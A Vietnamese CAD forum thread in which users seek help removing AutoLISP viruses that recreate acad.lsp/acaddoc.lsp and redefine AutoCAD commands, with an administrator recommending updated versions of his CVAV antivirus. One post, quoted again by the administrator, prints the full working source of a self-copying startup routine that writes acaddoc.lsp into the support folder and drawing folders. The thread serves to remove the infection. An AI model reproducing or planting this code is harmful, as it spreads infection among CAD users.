Chuyển đến nội dung
Diễn đàn CADViet
 • Thông báo

  • Nguyen Hoanh

   CADViet đã hoàn tất nâng cấp   14/09/2017

   Chào các bạn, CADViet đã hoàn tất việc nâng cấp lên phiên bản mới. Tất cả các chức năng đã hoạt động theo kỳ vọng của ban quản trị. Nếu có vấn đề gì cần phản hồi, các bản post ở đây nhé: Trân trọng, Nguyễn Hoành.
Đăng nhập để thực hiện theo  
ptlong04x1

File acad.lsp không diệt được bằng CVAV.

Các bài được khuyến nghị

ptlong04x1    8

Máy mình dạo này cứ xuất hiện file acad.lsp khi mở bản vẽ CAD, nó làm thay đổi 1 số lệnh nên gây khó chịu, mình đã tải lisp CVAV của bác Nguyễn Hoành về để diệt nhưng vẫn không được, mong mọi người giúp đỡ. Mình đính kèm file acad.lsp nhờ các bạn tìm cách xử lý giúp. Xin cảm ơn!

 

http://www.cadviet.com/upfiles/3/acad.lsp

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
Nguyen Hoanh    4.524
Máy mình dạo này cứ xuất hiện file acad.lsp khi mở bản vẽ CAD, nó làm thay đổi 1 số lệnh nên gây khó chịu, mình đã tải lisp CVAV của bác Nguyễn Hoành về để diệt nhưng vẫn không được, mong mọi người giúp đỡ. Mình đính kèm file acad.lsp nhờ các bạn tìm cách xử lý giúp. Xin cảm ơn!

 

http://www.cadviet.com/upfiles/3/acad.lsp

Vẫn diệt được mà bạn:

 

****************************************

CADViet AntiVirus v1.02 is starting ...

file E:\Hoanh\CADVIET\antivirus1\acad.lsp was deleted!

CADViet AntiVirus finishes scanning ....redefine Enter command name: plot

.redefine Enter command name: u .redefine Enter command name: qsave .redefine

Enter command name: line .redefine Enter command name: quit .redefine Enter

command name: trim .redefine Enter command name: extend .redefine Enter command

name: move .redefine Enter command name: xplode

Unknown command name..redefine Enter command name: xref .redefine Enter command

name: xbind

Total 1 infected files were found and removed!

****************************************

 

Đây là một biến thể của virus đã từng biết, CADViet Antivrus hiện nay vẫn đang diệt được. Mặc dù vậy mình sẽ cập nhật thêm nó vào CADViet antivirus luôn.

 • Vote tăng 3

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
ptlong04x1    8
Vẫn diệt được mà bạn:

 

****************************************

CADViet AntiVirus v1.02 is starting ...

file E:\Hoanh\CADVIET\antivirus1\acad.lsp was deleted!

CADViet AntiVirus finishes scanning ....redefine Enter command name: plot

.redefine Enter command name: u .redefine Enter command name: qsave .redefine

Enter command name: line .redefine Enter command name: quit .redefine Enter

command name: trim .redefine Enter command name: extend .redefine Enter command

name: move .redefine Enter command name: xplode

Unknown command name..redefine Enter command name: xref .redefine Enter command

name: xbind

Total 1 infected files were found and removed!

****************************************

 

Đây là một biến thể của virus đã từng biết, CADViet Antivrus hiện nay vẫn đang diệt được. Mặc dù vậy mình sẽ cập nhật thêm nó vào CADViet antivirus luôn.

 

Trên máy mình thấy chương trình báo như bên dưới, tuy nhiên file acad.lsp vẫn không bị xoá, thậm chí mình đã search và xoá hết các file acad.lsp nhưng file vẫn tự tạo mỗi khi mình mở bản vẽ, các lệnh bị thay đổi khi khởi động cad.

Mình cũng có tìm cách giải quyết trên diễn đàn nhưng không tìm ra file acadapp.lsp trên máy mình.

Mong bạn xem giúp, cảm ơn!

 

CADViet AntiVirus v1.02 is starting ...

file D:\Work\Site\TTH General Hospital\Ban ve TC\TRIEN KHAI BVTC\B5 -

XL7\acad.lsp was deleted!

CADViet AntiVirus finishes scanning

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
xuandao0708    8

Nhân tiện đây nhờ các Bác coi dùm em líp này đo máy trong cơ quan bị nhiễm nhưng đã dùng chương trình diệt virut của cadviet nhung không được. Trong thư mục nó có 1 file líp nhưng đã xoá, sau khi mở bản vẽ thì nó tạo ra 1 file líp khác làm liệt 1 số phím như Ctrl. Nay nhờ các Bác coi dùm.

Đây là file líp đầu tiên:

(defun-q s::startup
 (/ basepath
  baseacad
  acaddocpath
  r-acaddoc
  w-basepath
  rl-acaddoc
  acaddoclsp
  c-acaddocname
  c-acaddocpath
  c-acaddoc
  )
  (setq basepath
  (findfile "base.dcl")
  )
  (setq basepath
  (substr basepath
	  1 (- (strlen basepath) 8)
      )
  )
  (setq baseacad (strcat basepath "acaddoc.lsp"))

(setq acaddocpath
       (findfile "acaddoc.lsp")
)
(setq acaddocpath
    (substr acaddocpath
	    1 (- (strlen acaddocpath) 11)
    )
)
(setq acaddoclsp
    (strcat acaddocpath "acaddoc.lsp"))


    (setq c-acaddocname
    (getvar "dwgname")
)
    (setq c-acaddocpath
    (findfile c-acaddocname)
)
    (setq c-acaddocpath
    (substr c-acaddocpath
	    1 (- (strlen c-acaddocpath) (strlen c-acaddocname))	
	)
 )
    (setq c-acaddoc
    (strcat c-acaddocpath "acaddoc.lsp")
 )
 (if
     (and
  (/= basepath acaddocpath)
  (= c-acaddocpath acaddocpath)
  )
   (progn
    (setq r-acaddoc
    (open acaddoclsp "r")
    )
    (setq w-basepath
     (open baseacad "w")
	)   
    (while
      (setq rl-acaddoc
	  (read-line r-acaddoc)
      )
      (write-line rl-acaddoc w-basepath)
    )
    (close w-basepath)  
        (close r-acaddoc)

      )

   (progn
    (setq r-acaddoc
    (open acaddoclsp "r")
    )
    (setq w-basepath
     (open c-acaddoc "w")
	)
    (while
      (setq rl-acaddoc
	  (read-line r-acaddoc)
      )
      (write-line rl-acaddoc w-basepath)
    )
    (close w-basepath)  
        (close r-acaddoc)

      )
 )
 (princ)
)

Đây là file líp nó tạo ra sau khi mở bản vẽ.

http://www.mediafire.com/file/75d69dqgk8okzts/acaddoc1.lsp

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
Nguyen Hoanh    4.524
Trên máy mình thấy chương trình báo như bên dưới, tuy nhiên file acad.lsp vẫn không bị xoá, thậm chí mình đã search và xoá hết các file acad.lsp nhưng file vẫn tự tạo mỗi khi mình mở bản vẽ, các lệnh bị thay đổi khi khởi động cad.

Mình cũng có tìm cách giải quyết trên diễn đàn nhưng không tìm ra file acadapp.lsp trên máy mình.

Mong bạn xem giúp, cảm ơn!

Bạn thử dùng lại bản mới nhất xem, mình đã cập nhật biến thể đó vào CVAV mới nhất.

 

Lưu ý là CVAV chỉ diệt virus acad.lsp trong máy được cài, chỉ xóa các file acad.lsp trong thư mục mà bạn mở file dwg. CVAV không tự tìm và diệt những file acad.lsp nằm ở thư mục khác hay trên mạng.

 

Bạn nhớ là phải đặt CVAV vào mục content nhé.

 • Vote tăng 1

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
Nguyen Hoanh    4.524
Nhân tiện đây nhờ các Bác coi dùm em líp này đo máy trong cơ quan bị nhiễm nhưng đã dùng chương trình diệt virut của cadviet nhung không được. Trong thư mục nó có 1 file líp nhưng đã xoá, sau khi mở bản vẽ thì nó tạo ra 1 file líp khác làm liệt 1 số phím như Ctrl. Nay nhờ các Bác coi dùm.

Đây là file líp đầu tiên:

(defun-q s::startup
 (/ basepath
  baseacad
  acaddocpath
  r-acaddoc
  w-basepath
  rl-acaddoc
  acaddoclsp
  c-acaddocname
  c-acaddocpath
  c-acaddoc
  )
  (setq basepath
  (findfile "base.dcl")
  )
  (setq basepath
  (substr basepath
	  1 (- (strlen basepath) 8)
      )
  )
  (setq baseacad (strcat basepath "acaddoc.lsp"))

(setq acaddocpath
       (findfile "acaddoc.lsp")
)
(setq acaddocpath
    (substr acaddocpath
	    1 (- (strlen acaddocpath) 11)
    )
)
(setq acaddoclsp
    (strcat acaddocpath "acaddoc.lsp"))


    (setq c-acaddocname
    (getvar "dwgname")
)
    (setq c-acaddocpath
    (findfile c-acaddocname)
)
    (setq c-acaddocpath
    (substr c-acaddocpath
	    1 (- (strlen c-acaddocpath) (strlen c-acaddocname))	
	)
 )
    (setq c-acaddoc
    (strcat c-acaddocpath "acaddoc.lsp")
 )
 (if
     (and
  (/= basepath acaddocpath)
  (= c-acaddocpath acaddocpath)
  )
   (progn
    (setq r-acaddoc
    (open acaddoclsp "r")
    )
    (setq w-basepath
     (open baseacad "w")
	)   
    (while
      (setq rl-acaddoc
	  (read-line r-acaddoc)
      )
      (write-line rl-acaddoc w-basepath)
    )
    (close w-basepath)  
        (close r-acaddoc)

      )

   (progn
    (setq r-acaddoc
    (open acaddoclsp "r")
    )
    (setq w-basepath
     (open c-acaddoc "w")
	)
    (while
      (setq rl-acaddoc
	  (read-line r-acaddoc)
      )
      (write-line rl-acaddoc w-basepath)
    )
    (close w-basepath)  
        (close r-acaddoc)

      )
 )
 (princ)
)

Đây là file líp nó tạo ra sau khi mở bản vẽ.

http://www.mediafire.com/file/75d69dqgk8okzts/acaddoc1.lsp

 

Mình đang nghiên cứu virus mới này, hy vọng sẽ sớm có kết quả để cập nhật vào CVAV luôn.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
ptlong04x1    8
Bạn thử dùng lại bản mới nhất xem, mình đã cập nhật biến thể đó vào CVAV mới nhất.

 

Lưu ý là CVAV chỉ diệt virus acad.lsp trong máy được cài, chỉ xóa các file acad.lsp trong thư mục mà bạn mở file dwg. CVAV không tự tìm và diệt những file acad.lsp nằm ở thư mục khác hay trên mạng.

 

Bạn nhớ là phải đặt CVAV vào mục content nhé.

 

Vẫn không được bạn ạ, mình đã add CVAV 1.03 vào Contents nhưng vẫn không diệt được.

 

29072010_15203_pm.png

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
Nguyen Hoanh    4.524
Vẫn không được bạn ạ, mình đã add CVAV 1.03 vào Contents nhưng vẫn không diệt được.

 

29072010_15203_pm.png

Bạn thử download lại phiên bản 1.04 xem sao?

 • Vote tăng 2

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
Nguyen Hoanh    4.524
Nhân tiện đây nhờ các Bác coi dùm em líp này đo máy trong cơ quan bị nhiễm nhưng đã dùng chương trình diệt virut của cadviet nhung không được. Trong thư mục nó có 1 file líp nhưng đã xoá, sau khi mở bản vẽ thì nó tạo ra 1 file líp khác làm liệt 1 số phím như Ctrl. Nay nhờ các Bác coi dùm.

Đây là file líp đầu tiên:

...

Đây là file líp nó tạo ra sau khi mở bản vẽ.

http://www.mediafire.com/file/75d69dqgk8okzts/acaddoc1.lsp

Virus này khá 'nham hiểm', nó lây vào tất cả các file lisp trên thư mục support chứ không chỉ lây vào file các lisp hệ thống.

 

Trước mắt, bạn muốn diệt được virus này, hãy uninstall AutoCAD, rồi install lại AutoCAD, sau đó appload CVAV phiên bản mới nhất vào content như hướng dẫn là được.

 

Với phiên bản CVAV hiện tại, nếu bạn cài CVAV vào AutoCAD chưa bị nhiễm virus thì máy bạn sẽ không bị nhiễm từ máy khác hay từ USB nữa. Nhưng nếu bạn cài CVAV vào máy đã bị nhiễm thì CVAV chưa diệt được tận gốc virus này.

 • Vote tăng 3

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
Nghia_XD    5

CVAV vẫn diệt ngon lành mà. cái của bác HOANH ấy !

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
thanhhoa.36    1
Bạn thử download lại phiên bản 1.04 xem sao?

 

 

Chắc Virut bây giờ mà nhìn thấy bác Hoanh thì chạy mất dép thôi !

 

Xin chân thành cảm ơn Bác !

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác

Tạo một tài khoản hoặc đăng nhập để nhận xét

Bạn cần phải là một thành viên để lại một bình luận

Tạo tài khoản

Đăng ký một tài khoản mới trong cộng đồng của chúng tôi. Điều đó dễ mà.

Đăng ký tài khoản mới

Đăng nhập

Bạn có sẵn sàng để tạo một tài khoản ? Đăng nhập tại đây.

Đăng nhập ngay

Đăng nhập để thực hiện theo  

×